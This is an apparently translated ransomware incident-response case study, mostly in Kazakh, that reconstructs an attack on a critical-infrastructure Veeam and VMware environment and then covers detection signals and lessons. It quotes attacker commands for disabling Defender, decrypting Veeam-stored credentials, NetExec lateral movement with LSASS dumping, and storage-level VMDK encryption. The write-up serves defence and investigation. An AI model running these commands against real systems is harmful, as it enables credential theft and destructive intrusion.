2025 жылы ransomware неге басқару дағдарысы. Критикалық инфрақұрылымды бүзудың нақты жағдайы

Ransomware ұзақ уақыт бойы тек техникалық мәселе болып қалған жоқ. Бизнес үшін бұл тоқтап қалу тәуекелі, тікелей қаржылық шығындар және уақыт қысымында қабылданған шешімдер.

Осы ұзақ мақалада RTEAM тобы критикалық инфрақұрылымды бүзудың нақты жағдайын талдайды және тіпті жетілген ұйымдардың мұндай сценарийлерге неге дайын еместігін түсіндіреді.

Ransomware «шифрлеу бағдарламасы» емес, әдетте үш кезеңде дамитын мақсатты операция:

1. Инфрақұрылымға кіру.
2. Басқаруды басып алу: тіркелгілер, привилегиялар, желі бойынша қозғалу.
3. Шифрлеу және шантаж, жиі деректерді параллель ұрлаумен бірге.

Сырттан бәрі қарапайым көрінеді — «шифрледі және ақша сұрады». Тәжірибеде дерлік әрқашан барлау, дайындық және инфрақұрылым бойынша карта бойынша жұмыс бар.

Ransomware қауіпі тек шифрлеуде емес:

• Уақыт қысымы. Тоқтап қалу қымбаттаған сайын нашар шешім қабылдау тәуекелі жоғарылайды.
• Мақсатты тәсіл. Зиян мен выкуп максималды болған жерлерді нысанаға алады.
• «Б жоспары» жоқ. Шабуылдар жиі резервтік көшірмелерге, виртуализацияға және AD-ге бағытталады.

2024–2025 жылдардағы инциденттер бойынша біздің бақылауларымыз:

• ransomware инциденттері шамамен 30%+ өсті,
• компаниялардың жартысынан көбі соңында выкуп төлейді,
• шабуылдардың жартысы критикалық инфрақұрылымға түседі,
• орташа выкуп $1 млн жетеді.

Төлеу де кепілдік бермейді: кілт жұмыс істемей қалуы мүмкін, деректер құпиясы ашылуы мүмкін, компания жиі қайта нысанаға айналады.

Теория мен статистика маңызды, бірақ ransomware шабуылдарының нақты суретін тек тәжірибе көрсетеді. Төменде RTEAM тобы критикалық инфрақұрылымдағы инцидент бойынша жүргізген тергеуден жағдай.

Мүрәтке жүгіну кезіндегі жағдай

Клиент бізге елеулі мәселемен жүгінді:

• Инфрақұрылымның 99% ransomware зияндысымен шифрленген
• Барлық жүйелер таралуды болдырмау үшін электр қуатынан ажыратылған
• Барлық сыни қызметтер мен бизнес-процестердің жұмысы толығымен тоқтатылған
• Хост ешбір SOC-та мониторингте болмаған

Талдау үшін мыналар берілді:

• NGFW (желілік firewall) логтары
• Жалғыз компрометацияланған және шифрленбеген хостан артефактілер
• Желі архитектурасының схемалары және жарияланған NAT ресурстары тізімі

Алғашқы гипотезалар мен қайшылықтар

Талдаудың бастапқы кезеңінде бізде екі негізгі нұсқа болды:

Гипотеза 1: Белгілі осалдық арқылы компания веб-серверін компрометациялау

Гипотеза 2: VPN пайдаланушыларының бірінің креденшалдарының құпиясы ашылуы және жүйеге кіру үшін пайдалану

Алайда артефактілерді талдағанда сурет жеткілікті тез анық болды.

Логтардағы күтпеген табыстар

NGFW логтарында инфрақұрылым серверлерінің біріне интернеттен тікелей желілік өзара әрекеттерді таптық. Бұл таңқаларлық болды, себебі:

• Клиент бұл хосттың ешқашан интернетке жарияланбағанын мәлімдеді
• Хост жарияланған ресурстар тізімінде болмады
• Желі схемасында ол инфрақұрылымның тереңінде, ішкі қабаттармен қорғалған сияқты орналасқан

Windows логтарында біз сондай-ақ әкімшілік порттар (RDP) арқылы сыртқы IP-адрестен сәтті аутентификацияларды көрдік.

Қорытынды: хост интернеттен қолжетімді болды, клиент бұны білмеді.

Тереңірек қазғанда, бұл нақты инфрақұрылымға дайындалған үйлесілген, көп кезеңді шабуыл екені анық болды.

Кезең 1: RDP кіру нүктесі (T1110.001 Bruteforce: Password Guessing)

Берілген логтар RDP арқылы қашықтан қатынас алу сәтіне дейінгі оқиғаларды қамтамасыз етпеді, жергілікті әкімші тіркелгісінің (Administrator) паролі сөздік сөз (Password123) болғандықтан, қатынас алудың болжамды әдісі сыртқы қызмет паролін қайталау болды.

Кезең 2: Сыни хостты компрометациялау (T1021.001 RDP)

Шабуылшы осылайша толық привилегиялармен жергілікті әкімші тіркелгісінің астында Veeam Backup & Replication серверіне тікелей қатынас алды (Privilege Escalation TA0004).

• Барлық виртуалды инфрақұрылымға толық қатынас
• vCenter қатынасы үшін креденшалдар (барлық VM басқару)
• Резервтік көшірмелері бар барлық қоймаларға қатынас
• Жиі — домендік привилегиялы тіркелгілер

Кезең 3: Барлау және дайындық (TA0007 Discovery)

Желілік қолжетімділік пен Windows/SMB қызметтерін тексеру, порттарды тестілеу:

powershell Test-NetConnection -ComputerName 10.10.120.70 -Port 445,135,137,139

Сессияны инвентаризациялау және желілік қосылымдарды тазалау:

whoami; net use; net use * /delete

Қорғанысты өшіру және желілік/диск жолдарын дайындау

powershell Set-MpPreference -DisableRealtimeMonitoring $true Install-WindowsFeature NFS-Client Get-InitiatorPort; fcinfo; Get-IscsiSession; mpclaim -s -d

Сыртқы S3 ресурсының қолжетімділігін тексеру (пайдалы жүктемені жеткізу мүмкін арнасы)

certutil -url https://s3.akz.redacted.io

NFS және желілік тесттер үшін құралдарды дайындау (iPerf)

Install-WindowsFeature NFS-Client, RSAT-NFS-Admin

Шарлар мен қатынас құқықтары туралы ақпарат жинау. Veeam.Backup.Manager.exe процесінен PowerShell іске қосу. SAN/FC/iSCSI барлау, MSFC_* WMI кластарына қатынас:

Get-SMBShare, Get-SmbShareAccess
Get-InitiatorPort, fcinfo, Get-IscsiSession, mpclaim

Кезең 4: Тіркелгі деректерін шығару және шешу (TA0002 Execution)

Мұнда шабуылшы біз тәжірибемізде бұрын кездешпеген техниканы қолданды. Ол Veeam-дан парольдерді дамптау үшін ашық скриптті қолданды.

Процесс үш қадамнан тұрды:

Қадам 1 — Extraction (артефактілерді жинау)

Қадам 2 — Decryption (шешу)

Мұнда ең қызықтысы болады. Скрипт шешу үшін Veeam заңды кітапханаларын пайдаланды:

powershell Add-Type -Path "...\Veeam.Backup.Common.dll" [Veeam.Backup.Common.ProtectedStorage]::GetLocalString($encoded) [System.Security.Cryptography.ProtectedData]::Unprotect(..., [System.Security.Cryptography.DataProtectionScope]::LocalMachine)

Бұл жергілікті әкімшілік қатынас + заңды кітапхана = Veeam-ға енгізілген барлық құпиялардың толық компрометациясы дегенді білдіреді.

Қадам 3 — Exploitation (латеральды қозғалу)

Барлық креденшалдарды алғаннан кейін шабуылшы nxc.exe (NetExec) құралын мыналар үшін пайдаланды:

• SMB Spray — алынған парольдерді басқа хосттарда тексеру
• Lsass Dump — pass-the-hash шабуылдары үшін NTLM-хештерін алу

powershell .\nxc.exe smb <host> --exec-method smbexec .\nxc.exe smb <host> --exec-method atexec

Кезең 5: Виртуалды инфрақұрылымды шифрлеу

Мұнда шабуылшылар VMware архитектурасын терең түсінетінін көрсетті:

Қонақ ОЖ деңгейінде VM шифрлеудің орнына (бұл қорғаныс жүйесімен анықталып тоқтатылуы мүмкін), олар қойма деңгейінде шифрлеуді орындады:

powershell.\vixdisklib-rs.exe --san -h vcsa.redacted.kz ... -s snapshot-10320 "[LUN04] KBU_DB/KBU_DB.vmdk" .\vixdisklib-rs.exe --san -h 10.10.0.22 -u root -s snapshot-14 "[LUN04] .../KBU_DB.vmdk"

Сыни сәт: Veeam әрқашан резервтік көшірмелерді инфрақұрылым жұмыс істейтін қоймада сақтайды (әдетте жоғары қатынас құқықтары бар бір LUN-да). Сондықтан резервтік көшірмелер де шифрленді.

«Кездейсоқ» тергеуге көмек

Міне бізге шабуыл көзін түпкілікті анықтауға көмектескен қызықты сәт.

Өз әрекеттерін траблшутинг кезінде шабуылшы мына команданы қолданды:

nxc.exe smb 127.0.0.1 -u Admin -p Password -M lsassy
nxc.exe smb {PUBLIC IP} -u Admin -p Password -M lsassy

Ол нысана хосттары қатарында сыртқы IP-адресті көрсетті. Shodan-да тексергенде мыналар анықталды:

1. Бұл адрес Қазақстан желісіне тиесілі
2. Бұл серіктес компанияның (интегратор/қызмет жеткізуші) IP-і
3. Бұл адресте RPC қызметі жарияланған
4. Қызметте хостнейм туралы ақпарат көрсетілген — атау компания серверіне сәйкес
5. Shodan-да 10-нан астам порт ашық болған

Қорытынды: кіру нүктесі дәл осында болды. RDP, RPC, SMB, Veeam және т.б. ашық порттары бар дұрыс конфигурацияланбаған Windows сервер арқылы.

Шабуыл Kill Chain: әрекеттердің толық тізбегі

Қайта құрылған әрекет тізбегі келесідей болды:

1. Интернет → Сервер партнёра (Казахстан)
2. Scouting → Shodan выявил RPC с информацией о целевой системе
3. Network traversal → Через партнёра доступ к хосту жертвы (Veeam)
4. Initial Access → RDP с административными правами
5. Privilege Escalation → Уже под админом (не требовалась)
6. Persistence → Установка RAT (AnyDesk)
7. Reconnaissance → Анализ сети, поиск критических систем
8. Credential Dumping → Дамп Veeam, получение vCenter, доменных учёток
9. Lateral Movement → SMB Spraying, распространение по сети
10. Impact → Шифрование на уровне хранилища (99% инфры)
11. Extortion → Требование выкупа

Егер инфрақұрылым SOC мониторингінде болса, шабуыл бірнеше кезеңдерде кезектесіп — шифрлеуден бұрын көп уақыт бұрын көрінер еді.

Шабуыл кезеңдері бойынша негізгі сигналдар:

1. Жария IP-ден RDP брутфорс — көп кіру әрекеттері бойынша анықтау
2. Жария IP-ден сәтті кіру — аномальды орналасу және кіру контексті
3. Антивирусты өшіру — хоста қауіпсіздік саясатын өзгерту
4. Обфускацияланған PowerShell — сигнатуралар мен мінез-құлық бойынша анықтау
5. certutil бағдарлама жүктеу үшін — LOLBins анықтау
6. AnyDesk орнату — қашықтан қатынас / RAT анықтау
7. Veeam тіркелгі деректерін дамптау — осы техникаға арнайы ереже
8. SMB spraying — pass-the-hash белсенділігін анықтау
9. LSASS қатынасы — жад дамптау әрекеттерін анықтау

Жиыны: шабуылдың әртүрлі кезеңдерінде шамамен 9 сыни ескерту іске қосылар еді.

Олардың бір бөлігін ғана ұстаса да шабуылды тоқтатуға немесе зиянды айтарлықтай азайтуға мүмкіндік береді.

Бұл жағдайда ransomware инциденттерінде үнемі кездесетін типтік қателерді көрдік:

1. Компаниялар сыртқы периметрдің қаншалықты осал екенін білмейді

Сыни қызметтер сырттан қолжетімді, құжатталмаған және бақыланбайды

2. Жауап беру жоспары жоқ

Шешімдер паникада қабылданады, ал уақыт — шабуылшының негізгі ресурсы.

3. Оқшаулаудың орнына электр қуатын өшіру

Жад деректері мен шабуыл іздерінің жоғалуы тергеуді және қалпына келтіруді қиындатады.

4. Жазық желі

Бір түйменің компрометациясы тез бүкіл инфрақұрылымның компрометациясына айналады.

5. Резервтік көшірмелер формальды түрде бар

Production-мен бірге сақталады және шабуыл сәтінде құтқармайды.

Әр қате сыни және бәрі бірге апаттың болдырмай қойылмайтын сценарийін қалыптастырды.

Егер инцидент болған болса, негізгі басымдықтар келесідей:

• инфрақұрылымды оқшаулау, электр қуатын өшірмеу
• деректер қирағанға дейін шабуыл іздерін бекіту
• шешім қабылдау тобын тез жинау
• резервтік көшірмелердің күйін бағалау
• кіру нүктесін түсінгеннен кейін ғана қалпына келтіруді бастау

1. Ransomware — это управляемая операция, а не случайный инцидент.
2. Зрелость компании не гарантирует защиту без мониторинга и контроля периметра.
3. SOC — это способ лишить атакующего времени.
4. Бэкапы без изоляции — иллюзия защиты.
5. IR-план должен существовать до атаки, а не во время неё.
6. Постоянный контроль внешнего периметра (Attack Surface Management)

Тереңірек үңілуді қалайтындар үшін:

• Veeam credential recovery
• NIST Cybersecurity Framework (CSF) 2.0
• ESXiArgs VM Recovery Guidance

Ransomware — это не «про вирусы». Это про управляемость инфраструктуры, готовность к кризису и способность восстановиться, когда атакующий уже внутри.

Разница между управляемым инцидентом и катастрофой почти всегда заключается в подготовке до атаки.